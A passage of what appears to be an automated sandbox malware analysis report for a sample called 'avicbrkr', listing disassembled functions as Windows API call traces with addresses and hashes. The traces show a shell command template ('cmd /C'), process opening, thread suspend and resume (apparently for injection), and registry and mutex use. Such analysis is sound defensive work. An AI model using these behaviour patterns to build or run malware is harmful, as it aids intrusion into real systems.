                        • Part of subcall function 0037BBDE: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0037BC08
                        • Part of subcall function 0037BBDE: HeapFree.KERNEL32(00000000,00000000), ref: 0037BC57
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00372EEC
                        • Part of subcall function 00371E8C: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371E98
                        • Part of subcall function 00371E8C: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00371EB3
                        • Part of subcall function 00371E8C: lstrcpy.KERNEL32(00000000,0039E520), ref: 00371ED4
                        • Part of subcall function 00371E8C: HeapFree.KERNEL32(00000000,00000000,?), ref: 00371EF5
                        • Part of subcall function 00371F02: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371F0A
                        • Part of subcall function 003726B3: HeapFree.KERNEL32(00000000,?,?), ref: 00372723
                        • Part of subcall function 003724A8: lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                        • Part of subcall function 003724A8: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                        • Part of subcall function 003724A8: lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                        • Part of subcall function 003724A8: CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                        • Part of subcall function 003724A8: CloseHandle.KERNEL32(00000000), ref: 00372517
                        • Part of subcall function 003724A8: GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                        • Part of subcall function 003724A8: HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$ErrorLast$CloseHandle$CreateFilelstrlenwsprintf$HeaderImageThreadlstrcpy$CountCurrentExchangeInterlockedTick$AdjustDirectoryMappingModulePrivilegeSizeSystemTimeWindowsWritememset
                      • String ID: L"7
                      • API String ID: 416383009-2580434585
                      • Opcode ID: f22bee21aaa322a3e37f383afae96b1ea61b8eefb7eb2d19e7dfc7d0b29179f4
                      • Instruction ID: efcd05b373d7419ce3f13ce0700cd42a8fe59c06111bd80838c4ccacbd2cdf88
                      • Opcode Fuzzy Hash: f22bee21aaa322a3e37f383afae96b1ea61b8eefb7eb2d19e7dfc7d0b29179f4
                      • Instruction Fuzzy Hash: 26418F72604108FADF33BE649C81ABF376DAB05360F51C125F90D65491DB7D8F50BA62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038CA67: GetTickCount.KERNEL32 ref: 0038CA7D
                        • Part of subcall function 0038CA67: wsprintfA.USER32 ref: 0038CAB7
                        • Part of subcall function 0038CA67: GetModuleHandleA.KERNEL32(00000000), ref: 0038CAC9
                      • GetModuleHandleA.KERNEL32(00000000,?), ref: 0038CB4C
                      • GetLastError.KERNEL32 ref: 0038CB72
                      • SetEvent.KERNEL32(00000000), ref: 0038CB85
                      • GetModuleHandleA.KERNEL32(00000000), ref: 0038CBC9
                      • memset.NTDLL ref: 0038CBDE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HandleModule$CountErrorEventLastTickmemsetwsprintf
                      • String ID:
                      • API String ID: 4155302542-0
                      • Opcode ID: a0dddb3c435a92a79f16b410102b4292357410ad0a825b4afc5540c66f2ea520
                      • Instruction ID: 52dbb74e0da941c90b9d7008c7ee1833f3916f8dc956ff3d39bdff38bf84304c
                      • Opcode Fuzzy Hash: a0dddb3c435a92a79f16b410102b4292357410ad0a825b4afc5540c66f2ea520
                      • Instruction Fuzzy Hash: 43416FB1910704AFCB23EFA9DD89C6ABBBCEB85710B2555AAE446D3100D731AD04CB70
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00378968: RtlAllocateHeap.NTDLL(00000000,?), ref: 003789A2
                      • RtlAllocateHeap.NTDLL(00000000,00397045,?), ref: 00378EB4
                      • memcpy.NTDLL(00000000,00000000,00000000), ref: 00378ECB
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00378EDE
                      • memcpy.NTDLL(00000000,?,?), ref: 00378EED
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00378F51
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$memcpy$AllocateFree$CriticalLeaveSectionlstrlenmemset
                      • String ID:
                      • API String ID: 1966814898-0
                      • Opcode ID: 4a8c91aa00def1eac14c91ce31ec30b71adbdc0a52b17da034650e4a3d0cbd1f
                      • Instruction ID: a01e23d47855f1bd751e2991b1e88062d731de50e925aba8507e5b00eb5394e0
                      • Opcode Fuzzy Hash: 4a8c91aa00def1eac14c91ce31ec30b71adbdc0a52b17da034650e4a3d0cbd1f
                      • Instruction Fuzzy Hash: 6B41A131900218AFDB339FA4DC49BAE7BA9FF04310F118466F908AB260DB799D50DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 0038C7FD
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038C898
                      • _strupr.NTDLL ref: 0038C8C3
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0038C8D0
                      • CloseHandle.KERNEL32(00000000), ref: 0038C8EA
                        • Part of subcall function 0038C32E: memset.NTDLL ref: 0038C366
                        • Part of subcall function 0038C32E: memset.NTDLL ref: 0038C375
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$CloseCurrentHandleOpenProcessThread_struprlstrlen
                      • String ID:
                      • API String ID: 3929142895-0
                      • Opcode ID: 84ad982b8974fb4ded86885d6e293236fe5c70ecee9f716a8adf7875ed81a770
                      • Instruction ID: 221cbd90cc5630d3f53df27b3a0191f538261d01e0e506357f80d77d4c00146d
                      • Opcode Fuzzy Hash: 84ad982b8974fb4ded86885d6e293236fe5c70ecee9f716a8adf7875ed81a770
                      • Instruction Fuzzy Hash: 84412C71950318EFDF22AFA4CC49BDEBBB8EF48701F1150A6F600A6190D7759A40DFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                      • HeapFree.KERNEL32(00000000,0037D9D1), ref: 0037486B
                      • WaitForSingleObject.KERNEL32(00000000), ref: 003748CF
                      • HeapFree.KERNEL32(00000000,0037D9D1), ref: 003748F8
                      • HeapFree.KERNEL32(00000000,0037B7D2), ref: 00374908
                      • RegCloseKey.ADVAPI32(00000001,?,00000001,0037B7D2,00000000,00000000,?,0037D9D1), ref: 00374911
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$CloseCreateObjectOpenSingleWaitlstrlen
                      • String ID:
                      • API String ID: 55024742-0
                      • Opcode ID: 02a147f4d9b80554124864814a5254177684d8a55c39fabb45ad39c6a3d1d269
                      • Instruction ID: 33cd739108879364c71744820293af4dc53ca776cb22d799515684b3fdf43f85
                      • Opcode Fuzzy Hash: 02a147f4d9b80554124864814a5254177684d8a55c39fabb45ad39c6a3d1d269
                      • Instruction Fuzzy Hash: DC41A5B5D0011DFFDF129F94DD858EEBBB9FB08304F11846AE515A2220D33A5A54EB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 00377A7F: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00377AA5
                        • Part of subcall function 00377A7F: HeapFree.KERNEL32(00000000,?,00000000), ref: 00377B09
                      • lstrlen.KERNEL32(00000000,0039ED87,00000000,0039ED75,00000000,0039ED61,00000000,0039EE04,00000000,0039EDF9,00000000,0039ED51,00000000,00002334), ref: 00377BCB
                      • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00377BE0
                      • wsprintfA.USER32 ref: 00377BF5
                        • Part of subcall function 003776C1: memset.NTDLL ref: 003776D9
                        • Part of subcall function 003776C1: lstrlenW.KERNEL32(00000000,00000000,00000000,0039CD50,00000000,cmd /C "%s> %s1"), ref: 00377712
                        • Part of subcall function 003776C1: wcstombs.NTDLL ref: 0037771C
                        • Part of subcall function 003776C1: CreateProcessA.KERNEL32(00000000,00377AD2,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 00377750
                        • Part of subcall function 003776C1: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00377771
                        • Part of subcall function 003776C1: GetExitCodeProcess.KERNEL32(?,?), ref: 0037778E
                        • Part of subcall function 003776C1: GetLastError.KERNEL32 ref: 003777A6
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377C0F
                        • Part of subcall function 00377905: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00377955
                        • Part of subcall function 00377905: GetLastError.KERNEL32(?,00000000,00377C1F), ref: 00377986
                        • Part of subcall function 00377905: HeapFree.KERNEL32(00000000,00000000), ref: 00377998
                        • Part of subcall function 00377905: HeapFree.KERNEL32(00000000,00377C1F), ref: 003779AD
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00377C39
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$ErrorFileLastProcessTimelstrlen$CodeCreateCurrentExitMultipleNameObjectsSystemTempThreadWaitlstrcpymemsetwcstombswsprintf
                      • String ID:
                      • API String ID: 3059783489-0
                      • Opcode ID: c255ce019d6c99e06b2895e9b0926552e7217e9060ab23de353483cd47bd1111
                      • Instruction ID: e0d0edb79300ea84453b29703dd1926659ff95f71c2cf3622d598cb4ae010333
                      • Opcode Fuzzy Hash: c255ce019d6c99e06b2895e9b0926552e7217e9060ab23de353483cd47bd1111
                      • Instruction Fuzzy Hash: 7A21F63394966327CA3376745C8AE6FA95DCB89F50F0B8129FD08BB2A2DA4D8C0141E1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0037456E
                      • CreateWaitableTimerA.KERNEL32(0039D2D8,?,?), ref: 0037458D
                      • GetLastError.KERNEL32 ref: 0037459D
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 003745E4
                      • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 00374618
                        • Part of subcall function 00374505: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00374512
                        • Part of subcall function 00374505: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0037454C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$HeapTimerWaitable$FileFreeSystem$AllocateCloseCreateErrorLastOpenQueryValue
                      • String ID:
                      • API String ID: 3396801686-0
                      • Opcode ID: 0e2165f9071011c0c9a8f9d8786e39c9c6282325ceab009231b9078d3f82c40f
                      • Instruction ID: 8d58f9fcaf5c3f3fb95c734e43dfd2c0784a001001becce4fac7781179053436
                      • Opcode Fuzzy Hash: 0e2165f9071011c0c9a8f9d8786e39c9c6282325ceab009231b9078d3f82c40f
                      • Instruction Fuzzy Hash: FC314A71500229BBCF339F55CC89CAF7F79EF467A1F118416F81996160D739AA50CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0037A27E
                      • lstrcpy.KERNEL32(00000000,0039E3F1), ref: 0037A290
                      • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0037A29D
                      • lstrlen.KERNEL32(0039E3F1,?,?,?,?,?,00000000,00000000,?), ref: 0037A2AF
                        • Part of subcall function 0037AA37: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0037AA58
                        • Part of subcall function 0037AA37: wsprintfA.USER32 ref: 0037AA6D
                        • Part of subcall function 0037AA37: RegCreateKeyA.ADVAPI32(80000001,0039D500,00000000), ref: 0037AA85
                        • Part of subcall function 0037AA37: RegCloseKey.ADVAPI32(?), ref: 0037AAAD
                        • Part of subcall function 0037AA37: HeapFree.KERNEL32(00000000,00000000), ref: 0037AABC
                        • Part of subcall function 0037B206: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
                        • Part of subcall function 0037B206: wsprintfA.USER32 ref: 0037B33D
                        • Part of subcall function 0037B206: memcpy.NTDLL(00000000,?,?), ref: 0037B382
                        • Part of subcall function 0037B206: InterlockedExchange.KERNEL32(0039D22C,00000000), ref: 0037B3A0
                        • Part of subcall function 0037B206: HeapFree.KERNEL32(00000000,00000000), ref: 0037B3E3
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037A2E0
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree$wsprintf$CloseCreateExchangeInterlockedlstrcpylstrcpynlstrlenmemcpy
                      • String ID:
                      • API String ID: 1433411673-0
                      • Opcode ID: 8766cec68f430f9d244b3780dae8afcd3194361531edb7e5dd64adc8c43a5afa
                      • Instruction ID: cffbe5fe90af6453c284ecb74c28bca427fc5d7cb743c12ad579f3f95d274e82
                      • Opcode Fuzzy Hash: 8766cec68f430f9d244b3780dae8afcd3194361531edb7e5dd64adc8c43a5afa
                      • Instruction Fuzzy Hash: CC319E32900209FFDB22DF95DC89EEF7BB8EF84350F008415F81892251E77A9951CBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00374660: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0037466C
                        • Part of subcall function 00374660: SetLastError.KERNEL32(000000B7,?,003746B1), ref: 0037467D
                        • Part of subcall function 00374660: CreateMutexA.KERNEL32(0039D2D8,00000000,?,?,003746B1), ref: 00374690
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003746D1
                      • CloseHandle.KERNEL32(00000000), ref: 0037478F
                        • Part of subcall function 00374557: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0037456E
                        • Part of subcall function 00374557: CreateWaitableTimerA.KERNEL32(0039D2D8,?,?), ref: 0037458D
                        • Part of subcall function 00374557: GetLastError.KERNEL32 ref: 0037459D
                        • Part of subcall function 00374557: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 003745E4
                        • Part of subcall function 00374557: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 00374618
                      • GetLastError.KERNEL32 ref: 00374778
                      • ReleaseMutex.KERNEL32(00000000), ref: 00374781
                      • GetLastError.KERNEL32 ref: 0037479C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$Mutex$CreateOpenTimeTimerWaitable$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                      • String ID:
                      • API String ID: 1572077517-0
                      • Opcode ID: 5ef35cfe918a337493fb4831b7d1f18633d696fffdfeaab875b919e502c98966
                      • Instruction ID: 2ec9f889737d558d72911ad489b15a3f08d0c8a45bded167565f64f3221b53ab
                      • Opcode Fuzzy Hash: 5ef35cfe918a337493fb4831b7d1f18633d696fffdfeaab875b919e502c98966
                      • Instruction Fuzzy Hash: C231B1752012549FCB27AF34DC86D7E7BB9EB46710F128526F819DB3A0D736A940CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00375A17: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375A1F
                        • Part of subcall function 00375A17: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375A34
                        • Part of subcall function 00375A17: InterlockedIncrement.KERNEL32(0000001C), ref: 00375A4D
                      • RtlAllocateHeap.NTDLL(00000000,?,0039F241), ref: 0037B0B7
                      • memcpy.NTDLL(00000000,?,?), ref: 0037B0C8
                        • Part of subcall function 003759AC: InterlockedDecrement.KERNEL32(0000001C), ref: 003759B0
                      • lstrcmpi.KERNEL32(00000002,?), ref: 0037B10E
                      • memcpy.NTDLL(00000000,?,?), ref: 0037B122
                      • HeapFree.KERNEL32(00000000,00000000,0039F241), ref: 0037B161
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$CriticalHeapInterlockedSection$AllocateCloseCreateDecrementEnterFreeIncrementLeavelstrcmpi
                      • String ID:
                      • API String ID: 4195611527-0
                      • Opcode ID: c7f943e34469dbfc9b65dcd8d5eefa3d6d08166959da3e20606a2cd858711d60
                      • Instruction ID: 9f663d2f12c399ca197ed0df154ebff8933862308b8bc598d3922d3295d545dc
                      • Opcode Fuzzy Hash: c7f943e34469dbfc9b65dcd8d5eefa3d6d08166959da3e20606a2cd858711d60
                      • Instruction Fuzzy Hash: 0C218132900218BFDF239FA49C85B9EBB79FF04754F158029F909A6250E77A9D44CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038ECF0: lstrlen.KERNEL32(0039D47C,0039D418,00000000,?,0038F79B,0039D47C,0039706C,00000000,00397050,0039D424,0039D424,00000000,0038F2FB,00000000,?,?), ref: 0038ECFC
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375C4C
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375C5F
                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00375C70
                      • RtlAllocateHeap.NTDLL(00000000,0039D524,?), ref: 00375CDB
                      • InterlockedIncrement.KERNEL32(0039D51C), ref: 00375CF2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                      • String ID:
                      • API String ID: 3915436794-0
                      • Opcode ID: 42940c7c3cb9b470b41d52883caf6ee6cc06e10e691b1d96c3b7617444d318ae
                      • Instruction ID: 8a827f423786d4766482212a7913de1855239618460252a9e62bed64fa15b157
                      • Opcode Fuzzy Hash: 42940c7c3cb9b470b41d52883caf6ee6cc06e10e691b1d96c3b7617444d318ae
                      • Instruction Fuzzy Hash: 3031BC32505B069FCB37DF18D949A2ABBE8FB45324F02852AF95983260D775E811CBD1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00633223: OpenProcess.KERNEL32(00000400,00000000,00637614,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063323E
                        • Part of subcall function 00633223: IsWow64Process.KERNEL32(00637624,?,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063324F
                        • Part of subcall function 00633223: CloseHandle.KERNEL32(00637624), ref: 00633262
                      • OpenProcess.KERNEL32(001F0FFF,00000000,0063155F,0063155F,C000009A,00637614,00000000,?,?,0063155F,?,00000000,?,00637614), ref: 006323DF
                      • GetLastError.KERNEL32(?,?,0063155F,?,00000000,?,00637614), ref: 0063245B
                        • Part of subcall function 0063225F: memset.NTDLL ref: 00632282
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?,00000000,0063244E,CCCCFEEB,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063230D
                        • Part of subcall function 0063225F: WaitForSingleObject.KERNEL32(00000064), ref: 0063231B
                        • Part of subcall function 0063225F: SuspendThread.KERNEL32(?), ref: 0063232E
                        • Part of subcall function 0063225F: GetLastError.KERNEL32(00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063239A
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?), ref: 006323A5
                      • CloseHandle.KERNEL32(0063155F), ref: 00632453
                      • CloseHandle.KERNEL32(?), ref: 0063246D
                      • GetLastError.KERNEL32(?,?,0063155F,?,00000000,?,00637614), ref: 00632475
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastProcessThread$OpenResume$ObjectSingleSuspendWaitWow64memset
                      • String ID:
                      • API String ID: 1160281849-0
                      • Opcode ID: e8b0d460e7ff38f009efd7100d20006a8911a2eef4d6570bd19fb08769ee5949
                      • Instruction ID: c71d4c4306516f780619c12968f29f5d7299ac5de40d6174e0b305876128d174
                      • Opcode Fuzzy Hash: e8b0d460e7ff38f009efd7100d20006a8911a2eef4d6570bd19fb08769ee5949
                      • Instruction Fuzzy Hash: 2E21AE7290412ABFDB215FB4DC998AEBBF7EB09354F018435FA12A3261D7318D058BE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00386D12
                      • memset.NTDLL ref: 00386D29
                      • memset.NTDLL ref: 00386D40
                        • Part of subcall function 003836DE: CloseHandle.KERNEL32(00000000), ref: 003836E9
                        • Part of subcall function 003836DE: memset.NTDLL ref: 003836F8
                      • memset.NTDLL ref: 00386D58
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$CloseHandle
                      • String ID: m8
                      • API String ID: 1628094390-673699531
                      • Opcode ID: 5860f9df61d59d31d876956ad38ac41d829acf3e3b2c1d4f7fab8a174386d2f6
                      • Instruction ID: d0332866b5d932bebf6c9ebac2262cfbfd8f86d48b36564e01de87cd9fe1452e
                      • Opcode Fuzzy Hash: 5860f9df61d59d31d876956ad38ac41d829acf3e3b2c1d4f7fab8a174386d2f6
                      • Instruction Fuzzy Hash: 0221D272600A09BBCB22AF61DC86D667B39FF09344B060558F94586C21D732F8B6DFD1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GlobalFix.KERNEL32(00000000), ref: 0038C625
                      • lstrlenW.KERNEL32(00000000), ref: 0038C632
                      • memset.NTDLL ref: 0038C642
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • lstrcpyW.KERNEL32(00000000,00000000), ref: 0038C680
                        • Part of subcall function 0038BD86: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 0038BDE0
                        • Part of subcall function 0038BD86: CloseHandle.KERNEL32(00000000), ref: 0038BDFE
                        • Part of subcall function 0038BD86: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0038BE66
                        • Part of subcall function 0038BD86: GetSystemTimeAsFileTime.KERNEL32(00000008,00000014), ref: 0038BEE5
                      • GlobalUnWire.KERNEL32(?), ref: 0038C692
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$FileGlobalSystem$AllocateCloseHandleHeapOpenProcessWirelstrcpylstrlenmemset
                      • String ID:
                      • API String ID: 4029449214-0
                      • Opcode ID: ce50484d1af07a6a4139ba558379150fe67d90e72d17efeb194c29dd1ec52c0c
                      • Instruction ID: 006a2bacc0dc301c018862c7cb6cce56aecaad2d1f86eba6d66c185941fb0d11
                      • Opcode Fuzzy Hash: ce50484d1af07a6a4139ba558379150fe67d90e72d17efeb194c29dd1ec52c0c
                      • Instruction Fuzzy Hash: A8214172920309BBDB126FB4EC49BDEBBBCBF08741F052166F501E6190EB75D9048B64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileW.KERNEL32(0039F998,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00386F28
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,003913E1,00000000,0039F998,00000000), ref: 00386F38
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • ReadFile.KERNEL32(0039F998,00000000,00000000,00000000,00000000), ref: 00386F64
                      • GetLastError.KERNEL32(?,?,003913E1,00000000,0039F998,00000000), ref: 00386F89
                      • CloseHandle.KERNEL32(000000FF), ref: 00386F9A
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$Heap$AllocateCloseCreateErrorFreeHandleLastReadSize
                      • String ID:
                      • API String ID: 3493789272-0
                      • Opcode ID: 8b673a3c0539bfc970e6ab2fd97e810adecd6d079e0934fdd6b7cbadd0e798c8
                      • Instruction ID: 0c36f0b3ca8a41f604c37973a33534b96d2c4c68fd03cac9e1a4097d08eb302b
                      • Opcode Fuzzy Hash: 8b673a3c0539bfc970e6ab2fd97e810adecd6d079e0934fdd6b7cbadd0e798c8
                      • Instruction Fuzzy Hash: 81110672104314BFDB237F68EC89AAE7B6DDB04764F1246AAFA1597290C631DD4087A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 00378792
